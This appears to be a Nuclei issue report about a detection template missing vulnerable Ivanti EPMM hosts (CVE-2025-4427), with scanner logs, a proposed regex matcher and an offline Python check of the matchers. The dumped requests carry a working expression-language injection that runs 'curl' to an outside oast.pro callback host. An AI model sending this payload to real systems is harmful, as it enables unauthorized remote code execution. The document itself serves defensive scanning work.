Closed
Labels: Done, Ready to merge, false-negative (Nuclei template missing valid results)
Description

Template IDs or paths
- http/cves/2025/CVE-2025-4427.yaml

Environment
- OS: Sequoia 15.4.1
- Nuclei: v3.4.4
- Nuclei-Templates: v10.2.2

Steps To Reproduce
Certain hosts running vulnerable versions of EPMM respond with the created process object instead of the expected process ID, which is not detected by the current template. The vulnerable versions execute code, which can be seen on the interact.sh client. I have attached the JSON response below.
Relevant dumped responses
[INF] [CVE-2025-4427] Dumped HTTP request for https://DOMAIN/mifs/rs/api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s0z134od1hmyeaj.oast.pro')%7d
GET /mifs/rs/api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s0z134od1hmyeaj.oast.pro')%7d HTTP/1.1
Host: DOMAIN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2025-4427] Dumped HTTP response https://DOMAIN/mifs/rs/api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s0z134od1hmyeaj.oast.pro')%7d
HTTP/1.1 400
Connection: close
Content-Length: 313
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json;charset=UTF-8
Date: Fri, 30 May 2025 22:54:07 GMT
Expires: Tue, 20 May 2025 22:54:07 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: server
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SameOrigin
X-Xss-Protection: 1; mode=block
{"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'java.lang.UNIXProcess@6dbfc773' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'java.lang.UNIXProcess@6dbfc773' is invalid. Valid formats are 'json', 'csv'."]}]}
[INF] [CVE-2025-4427] Dumped HTTP request for https://DOMAIN/mifs/rs/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro')%7d
GET /mifs/rs/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro')%7d HTTP/1.1
Host: DOMAIN
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2025-4427] Dumped HTTP response https://DOMAIN/mifs/rs/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro')%7d
HTTP/1.1 400
Connection: close
Content-Length: 313
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json;charset=UTF-8
Date: Fri, 30 May 2025 22:54:08 GMT
Expires: Tue, 20 May 2025 22:54:08 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: server
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SameOrigin
X-Xss-Protection: 1; mode=block
{"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'java.lang.UNIXProcess@279dbc51' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'java.lang.UNIXProcess@279dbc51' is invalid. Valid formats are 'json', 'csv'."]}]}
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 2/2 (100%)
[d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk] Received DNS interaction from X.X.X.X at 2025-05-30 22:54:08
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 3031
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 4000
;; QUESTION SECTION:
;d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro.    IN       AAAA
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 3031
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro.    IN       AAAA
;; ANSWER SECTION:
d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro.     3600    IN      A       X.X.X.X
;; AUTHORITY SECTION:
d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro.     3600    IN      NS      ns1.oast.pro.
d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro.     3600    IN      NS      ns2.oast.pro.
;; ADDITIONAL SECTION:
ns1.oast.pro.   3600    IN      A       X.X.X.X
ns2.oast.pro.   3600    IN      A       X.X.X.X

Anything else?
I was able to get the nuclei template working by modifying it with a regex to match the process creation object, since everything after the @ is randomly generated.
    # Matchers are combined by the request-level `matchers-condition`, which defaults
    # to `or` when omitted, so either matcher below is enough for the template to fire.
    matchers:
      # Word matcher for the Process[pid=...] form of the rejected format value.
      - type: word
        part: body
        words:
          - "Format 'Process[pid="
          - "localizedMessage"
        condition: or
      # Regex matcher for the java.lang.UNIXProcess@<hex> form seen in the dumped
      # responses; the identity hash after '@' differs on every request.
      - type: regex
        part: body
        regex:
          - "Format 'java\\.lang\\.UNIXProcess@[0-9a-f]+'"
        condition: and
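As an added offline check (this is example code written for this page, not part of the issue or of the nuclei-templates project), the Python below re-implements the matcher semantics of the snippet above (per-matcher `condition`, request-level `matchers-condition` defaulting to `or`) and evaluates them against the message from the first dumped response plus two constructed bodies: a `Process[pid=...]` variant of the kind the word matcher targets, and a plain validation error that carries `localizedMessage` but no process object. The pid and exitValue text in the constructed bodies are invented.

```python
import json
import re

# Matchers from the YAML posted in the issue, expressed as plain data for this added check.
WORD_MATCHER = {"words": ["Format 'Process[pid=", "localizedMessage"], "condition": "or"}
REGEX_MATCHER = {"regex": [r"Format 'java\.lang\.UNIXProcess@[0-9a-f]+'"], "condition": "and"}


def combine(hits, condition):
    """Per-matcher `condition`: `and` needs every pattern to hit; anything else behaves as `or`."""
    return all(hits) if condition == "and" else any(hits)


def word_match(body, matcher):
    """Nuclei `word` matcher: case-sensitive substring test for each listed word."""
    return combine([w in body for w in matcher["words"]], matcher.get("condition"))


def regex_match(body, matcher):
    """Nuclei `regex` matcher: unanchored search in the body (Python `re` is close enough here)."""
    return combine([re.search(p, body) is not None for p in matcher["regex"]], matcher.get("condition"))


def evaluate(body, matchers_condition="or"):
    """Per-matcher verdicts plus the template-level result under `matchers-condition`."""
    verdicts = {"word": word_match(body, WORD_MATCHER), "regex": regex_match(body, REGEX_MATCHER)}
    return {**verdicts, "matched": combine(list(verdicts.values()), matchers_condition)}


def error_body(text):
    """Wrap a message in the EPMM validation-error JSON envelope seen in the dumped responses."""
    msg = {"type": "Error", "messageKey": "com.mobileiron.vsp.messages.validation.global.error",
           "localizedMessage": text, "messageParameters": [text]}
    return json.dumps({"messages": [msg]}, separators=(",", ":"))


TAIL = " is invalid. Valid formats are 'json', 'csv'."
SAMPLES = {
    # Verbatim message from the first dumped response in the issue.
    "dumped_unixprocess": error_body("Format 'java.lang.UNIXProcess@6dbfc773'" + TAIL),
    # Constructed: the Process[pid=...] form the word matcher targets (pid and text invented).
    "constructed_processimpl": error_body("Format 'Process[pid=4242, exitValue=\"not exited\"]'" + TAIL),
    # Constructed: an ordinary rejected format value, i.e. no process object at all.
    "constructed_benign": error_body("Format 'xml'" + TAIL),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:25s} {evaluate(body)}")
```

Running it shows that the regex matcher is what catches the dumped body, and that under the default `or` the `localizedMessage` word alone is enough to match a plain validation error, which matters when tuning the word matcher for false positives.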